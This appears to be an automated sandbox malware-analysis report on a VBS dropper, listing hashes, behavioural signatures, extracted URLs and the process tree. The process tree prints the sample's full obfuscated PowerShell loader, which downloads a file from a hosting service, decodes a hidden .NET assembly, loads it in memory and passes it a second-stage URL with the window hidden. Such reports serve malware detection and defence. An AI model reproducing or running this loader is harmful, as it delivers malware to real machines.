Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
12-11-2024 03:08
Static task
static1
Behavioral task
behavioral1
Sample
f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348.vbs
Resource
win10v2004-20241007-en
General
-
Target
f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348.vbs
-
Size
11KB
-
MD5
f5678ceb6c0d259337b4dab43f009e97
-
SHA1
71bc74501d1b126adb0bed8d7e4c3e182cd5bbbe
-
SHA256
f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348
-
SHA512
463b6cca15009a574a454637f3d5555c3ebde0117f65c12d0803e9ca3dac0e534b157ef473deaf703b60db396bde0a384b9471f4fccaed33995217353619a739
-
SSDEEP
192:mXThtJfTvuOg25CfSkYiGh6yR4W8L8tnQ2+mi3F8w/RHXS:8FOGqF/JHXS
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exepowershell.exeflow pid Process 3 1892 WScript.exe 4 1892 WScript.exe 8 2772 powershell.exe 9 2772 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 2772 powershell.exe 612 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 612 powershell.exe 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 612 powershell.exe Token: SeDebugPrivilege 2772 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
WScript.exeWScript.exepowershell.exedescription pid Process procid_target PID 1792 wrote to memory of 1892 1792 WScript.exe 31 PID 1792 wrote to memory of 1892 1792 WScript.exe 31 PID 1792 wrote to memory of 1892 1792 WScript.exe 31 PID 1892 wrote to memory of 612 1892 WScript.exe 32 PID 1892 wrote to memory of 612 1892 WScript.exe 32 PID 1892 wrote to memory of 612 1892 WScript.exe 32 PID 612 wrote to memory of 2772 612 powershell.exe 34 PID 612 wrote to memory of 2772 612 powershell.exe 34 PID 612 wrote to memory of 2772 612 powershell.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\XqrJnUsDhYijtro.vbs"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0s2aW1hZ2VVcmwgPSA5U2NodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9mJysnaWxla2V5PTJBYV9iV28nKyc5UmV1NDUnKyd0JysnN0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVEknKydDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTRiYjIwOWM2MmMxNzMwOTQ1MTc2YTA5MDRmIDlTYztPSzZ3ZWJDJysnbGllbnQgPSBOZXcnKyctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O09LNmltYWdlQnl0ZXMgPSBPSzZ3ZWJDJysnbGllbnQuRG93bmxvJysnYWREYXRhKE9LNmltYWdlVXJsKTtPSzZpbWFnZVRleHQgPSBbU3lzdGVtLicrJ1RleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhPSzZpbWFnJysnZUJ5dGVzKTtPSzZzdGEnKydydEZsYWcgPSA5U2M8PEJBU0U2NF9TVEFSVD4+OVNjO09LNmVuZEZsYWcgPSA5U2M8PEJBU0U2NF9FTkQ+PjlTYztPSzZzdGFydEluZGV4ID0gT0s2aW1hZ2VUZXh0LkluZGV4T2YoT0s2c3RhcnRGbCcrJ2FnKScrJztPSzZlbmRJbmRleCA9IE9LNmltYScrJ2dlVGV4dC5JbicrJ2RleE9mKE9LNmVuZEZsYWcpO09LNnN0YScrJ3J0SW5kZXggLWdlIDAgLWFuZCBPSzZlbmRJbmRleCAtZ3QgT0s2c3RhcnRJbmRleDtPSzZzdGFydEluZGV4ICsnKyc9IE9LNnN0YXJ0RmxhZy5MZW5ndGg7T0s2YmFzZTY0TGVuZ3RoID0gT0s2ZW5kSW5kZXggLSBPSzZzdGFydEluZGV4O09LNmJhc2U2NENvbW1hbmQgPSBPSzZpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ09LNnN0JysnYXJ0SW5kZXgsIE9LNmJhc2U2NExlbmd0aCk7T0s2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoT0s2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHRyYiBGb3JFYWNoLU9iamVjdCB7IE9LNl8gfSlbLTEuLi0oJysnT0s2YmFzZTY0Q28nKydtbWFuZC5MZW5ndGgpXTtPSzZjb21tYW4nKydkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjonKydGcm9tQmFzZTY0U3RyJysnaScrJ25nKE9LNmJhcycrJ2U2NCcrJ1JldmVyJysnc2VkKTtPSzZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoT0s2Y29tbWFuZEJ5dGVzKTtPSzZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDlTJysnY1ZBSTlTYyk7T0s2dmFpTWV0aG9kLkludm9rZShPSzZudWxsLCcrJyBAKDlTY3QnKyd4dC5MU1NXUy9rbG8vdWUuaHN1cHdzcmVsbG9yLnN1cC8vOnB0dGg5U2MsIDlTY2Rlc2F0aXZhZG85U2MsIDlTY2Rlc2F0aXZhZG85U2MsIDlTYycrJ2Rlc2F0aXZhZG85U2MsIDlTJysnY2Rlc2F0aXZhJysnZCcrJ285U2MsIDlTYzE5U2MsIDlTY09uZURyaXZlU2V0dXA5U2MsIDlTY2Rlc2F0aXZhZG85U2MsIDlTY2Rlc2F0aXZhJysnZG85U2MsOVNjZGVzYXRpdmFkbzlTYyw5U2NkZXNhdGl2YWRvOVNjLDlTY2QnKydlc2F0aXZhZG85U2MsOVNjMTlTYyw5U2NkZXNhJysndGl2YWRvOVNjKSk7JykgIC1yZXBsQUNlKFtDSGFyXTExNitbQ0hhcl0xMTQrW0NIYXJdOTgpLFtDSGFyXTEyNC1jcmVwbGFDRSAnT0s2JyxbQ0hhcl0zNiAgLXJlcGxBQ2UgICc5U2MnLFtDSGFyXTM5KSB8ICYgKChHdiAnKk1kUionKS5OYW1FWzMsMTEsMl0tam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OK6imageUrl = 9Schttps://1017.filemail.com/api/file/get?f'+'ilekey=2Aa_bWo'+'9Reu45'+'t'+'7BU1kVgsd9pT9pgSSlvStGrnTI'+'CfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f 9Sc;OK6webC'+'lient = New'+'-Object System.Net.WebClient;OK6imageBytes = OK6webC'+'lient.Downlo'+'adData(OK6imageUrl);OK6imageText = [System.'+'Text.Encoding]::UTF8.GetString(OK6imag'+'eBytes);OK6sta'+'rtFlag = 9Sc<<BASE64_START>>9Sc;OK6endFlag = 9Sc<<BASE64_END>>9Sc;OK6startIndex = OK6imageText.IndexOf(OK6startFl'+'ag)'+';OK6endIndex = OK6ima'+'geText.In'+'dexOf(OK6endFlag);OK6sta'+'rtIndex -ge 0 -and OK6endIndex -gt OK6startIndex;OK6startIndex +'+'= OK6startFlag.Length;OK6base64Length = OK6endIndex - OK6startIndex;OK6base64Command = OK6imageText.Substring('+'OK6st'+'artIndex, OK6base64Length);OK6base64Reversed = -join (OK6base64Command.ToCharArray() trb ForEach-Object { OK6_ })[-1..-('+'OK6base64Co'+'mmand.Length)];OK6comman'+'dBytes = [System.Convert]::'+'FromBase64Str'+'i'+'ng(OK6bas'+'e64'+'Rever'+'sed);OK6loadedAssembly = [System.Reflection.Assembly'+']::Load(OK6commandBytes);OK6vaiMethod = [dnlib.IO.Home].GetMethod(9S'+'cVAI9Sc);OK6vaiMethod.Invoke(OK6null,'+' @(9Sct'+'xt.LSSWS/klo/ue.hsupwsrellor.sup//:ptth9Sc, 9Scdesativado9Sc, 9Scdesativado9Sc, 9Sc'+'desativado9Sc, 9S'+'cdesativa'+'d'+'o9Sc, 9Sc19Sc, 9ScOneDriveSetup9Sc, 9Scdesativado9Sc, 9Scdesativa'+'do9Sc,9Scdesativado9Sc,9Scdesativado9Sc,9Scd'+'esativado9Sc,9Sc19Sc,9Scdesa'+'tivado9Sc));') -replACe([CHar]116+[CHar]114+[CHar]98),[CHar]124-creplaCE 'OK6',[CHar]36 -replACe '9Sc',[CHar]39) | & ((Gv '*MdR*').NamE[3,11,2]-joiN'')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD503e4e4d0259b3af7b37e2802812d9128
SHA1fcef4018ec7206fb296b79e8035bb02457e39872
SHA25626524695f59b3f155be3c94504537f36c5de23bc2226e5819b7919023dd5c183
SHA512dbdaa2707f6e19442a7d55f119487b418f17a040462b11fc88653e130709c1127e2d0d1923dde3258546ff07b18c1d3c5cdbc2a7ff40f342d3689a618159e1a6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD50b9439986ee468c1b245ae3b109fc8f8
SHA199e47c9f6bbfa40e0a6a928ca7288a078b0871a4
SHA25633acb07b5b81eb2d21ed2f0b5b261bc42dd2bf3fd8fe5976fd4ee9a9420489b9
SHA51220ffb5a73266da8a49e4de08034659e37ef8eed6c7d648476564e1291c1be9a5ddc81774227e78515d3bf5ce46cc648fbbb0372496dae365ad4595c29b583892